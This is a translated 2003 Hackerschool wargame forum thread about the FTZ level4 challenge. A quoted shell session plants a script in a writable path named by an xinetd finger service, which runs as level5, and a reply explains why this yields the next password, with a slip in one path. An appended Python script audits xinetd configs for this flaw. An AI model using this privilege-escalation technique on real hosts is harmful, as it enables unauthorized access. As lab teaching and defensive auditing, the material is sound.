http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=654
>[level4@ftz level4]$ cat hint
>
>
>누군가 /etc/xinetd.d/에 백도어를 심어놓았다.!
>
>
>[level4@ftz level4]$ cd /etc/xinetd.d
>[level4@ftz xinetd.d]$ ls -al
>total 60
>drwxr-xr-x 2 root root 4096 Aug 5 23:50 .
>drwxr-xr-x 51 root root 4096 Oct 24 08:46 ..
>-rw-r--r-- 1 root root 171 Mar 28 2003 backdoor
>-rw-r--r-- 1 root root 295 Mar 28 2003 chargen
>-rw-r--r-- 1 root root 315 Mar 28 2003 chargen-udp
>-rw-r--r-- 1 root root 295 Mar 28 2003 daytime
>-rw-r--r-- 1 root root 315 Mar 28 2003 daytime-udp
>-rw-r--r-- 1 root root 287 Mar 28 2003 echo
>-rw-r--r-- 1 root root 306 Mar 28 2003 echo-udp
>-rw-r--r-- 1 root root 312 Mar 28 2003 servers
>-rw-r--r-- 1 root root 310 Mar 28 2003 services
>-rw-r--r-- 1 root root 406 Mar 28 2003 sgi_fam
>-rw-r--r-- 1 root root 302 Mar 28 2003 telnet
>-rw-r--r-- 1 root root 319 Mar 28 2003 time
>-rw-r--r-- 1 root root 315 Mar 28 2003 time-udp
>[level4@ftz xinetd.d]$ cat backdoor
>service finger
>{
> disable = no
> flags = REUSE
> socket_type = stream
> wait = no
> user = level5
> server = /home/level4/tmp/backdoor
> log_on_failure += USERID
>}
>[level4@ftz xinetd.d]$ cd /home/level4/tmp
>[level4@ftz tmp]$ ls -al
>total 8
>drwxrwxr-x 2 root level4 4096 Oct 27 19:20 .
>drwxr-xr-x 4 root level4 4096 May 7 2002 ..
>[level4@ftz tmp]$ vi backdoor
>#!/bin/bash
>my-pass
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>~
>:wq
>"backdoor" [New] 2L, 20C written
>[level4@ftz tmp]$ ls -al
>total 12
>drwxrwxr-x 2 root level4 4096 Oct 27 19:41 .
>drwxr-xr-x 4 root level4 4096 May 7 2002 ..
>-rw-rw-r-- 1 level4 level4 20 Oct 27 19:41 backdoor
>[level4@ftz tmp]$ finger level5@localhost
>Broken pipe
>[level4@ftz tmp]$
>
>------------------------------------------------------------
>
>This is part of a post that someone wrote below.
>
>I looked at this and roughly followed along, and the level5 password showed up..
>
>But even when I think about it, I don't understand how the password was obtained.
>
>What is the principle behind it~?
>
>I'm dying of curiosity.. TT
>
In your post there is this part:
service finger
{
disable = no
flags = REUSE
socket_type = stream
wait = no
user = level5
server = /home/level4/tmp/backdoor
log_on_failure += USERID
}
You can think of this as the backdoor's configuration file.
Looking at the top of it, you can see that it uses the finger port.
You don't need to know the rest, but if you look closely,
the user field says level5, the server field says /home/level4/tmp/backdoor,
and log_on_failure says USERID.
To interpret what that means: when you connect to the finger port, level5's privileges are granted without any login process, and then the program /home/level5/tmp/backdoor is executed.
That is why you went to /home/level5/tmp/ with cd and then wrote a program called backdoor.
This backdoor is written as a shell script, and shell scripts always
start with #!/bin/bash.
Looking at its contents, it is my-pass, so you can tell it is a program that prints the password.
Also, after creating the program, you have to use chmod to give execute permission to other users as well,
because the backdoor program is written by me (level4), but finger, which runs the program, operates with level5's privileges.
The usage of finger is: finger username@IP-address
localhost is the IP that refers to the machine itself; since Hackerschool both runs finger and receives it, you have to type localhost, which refers to itself.
Of course, you can also type ftz's IP address or ftz.hackerschool.org.
Hit : 3984 Date : 2003/11/22 06:58
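A defensive check for the misconfiguration discussed in the answer above, as an added example that is not part of the original thread: it parses xinetd service blocks and flags an enabled service whose `server` program is missing or sits where an account outside a trusted set can write. The names `parse_xinetd`, `audit` and `demo`, and the sandbox directory, are constructed for illustration; only the server file and its immediate parent directory are examined.

```python
import os, re, stat, tempfile

def parse_xinetd(text):
    """Parse 'service NAME { key = value }' blocks into {name: {key: value}}."""
    services, current = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = re.match(r"service\s+(\S+)", line)
        if m:
            current = services.setdefault(m.group(1), {})
        elif line.startswith("}"):
            current = None
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            current[key.rstrip(" \t+-")] = value.strip()  # '=', '+=' and '-='
    return services

def audit(text, trusted_uids=(0,)):
    """Flag enabled services whose server is missing or replaceable by untrusted users."""
    findings = []
    for name, a in parse_xinetd(text).items():
        server, who = a.get("server"), a.get("user", "?")
        if a.get("disable") == "yes" or not server:
            continue
        if not os.path.exists(server):
            findings.append((name, who, "server missing"))
        for path in filter(os.path.exists, (server, os.path.dirname(server))):
            st = os.stat(path)
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((name, who, "group/other-writable: " + path))
            if st.st_uid not in trusted_uids:
                findings.append((name, who, "untrusted owner: " + path))
    return findings

def demo():
    """Constructed sandbox mirroring the page: group-writable dir, no server file."""
    d = os.path.join(tempfile.mkdtemp(), "tmp")
    os.mkdir(d)
    os.chmod(d, 0o775)
    conf = ("service finger\n{\n disable = no\n user = level5\n"
            " server = %s/backdoor\n log_on_failure += USERID\n}\n" % d)
    me = (os.getuid(),)            # stands in for root inside the sandbox
    before = audit(conf, me)
    os.chmod(d, 0o755)             # fix: directory no longer group-writable
    fd = os.open(os.path.join(d, "backdoor"), os.O_CREAT | os.O_WRONLY, 0o755)
    os.close(fd)                   # placeholder server program now exists
    return before, audit(conf, me)

if __name__ == "__main__":
    print(demo())
```

On a real host, call `audit()` on the contents of each file under /etc/xinetd.d with the default `trusted_uids=(0,)`.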